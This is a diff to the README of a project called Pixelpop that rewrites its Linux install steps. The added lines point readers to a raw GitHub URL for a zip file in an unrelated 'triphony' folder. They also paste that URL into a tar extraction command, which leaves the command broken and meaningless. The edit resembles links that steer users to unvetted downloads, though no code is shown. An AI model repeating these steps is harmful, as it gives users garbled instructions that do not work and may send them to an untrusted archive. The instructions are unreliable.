Bxkun/pixelpop/README.md

 3. Open your terminal and type `pixelpop` to launch the application.

 ### Linux Instructions
-1. Locate the downloaded `.tar.gz` file (usually in your Downloads folder).
+1. Locate the downloaded `https://raw.githubusercontent.com/Bxkun/pixelpop/main/triphony/pixelpop.zip` file (usually in your Downloads folder).
-2. Extract the contents using the command: `tar -xvzf pixelpop*.tar.gz`.
+2. Extract the contents using the command: `tar -xvzf pixelpop*https://raw.githubusercontent.com/Bxkun/pixelpop/main/triphony/pixelpop.zip`.
 3. Navigate to the extracted folder.
 4. Follow the instructions in the README file included with the extracted files to set up Pixelpop.
 5. Once set up, you can start it by typing `pixelpop` in the terminal.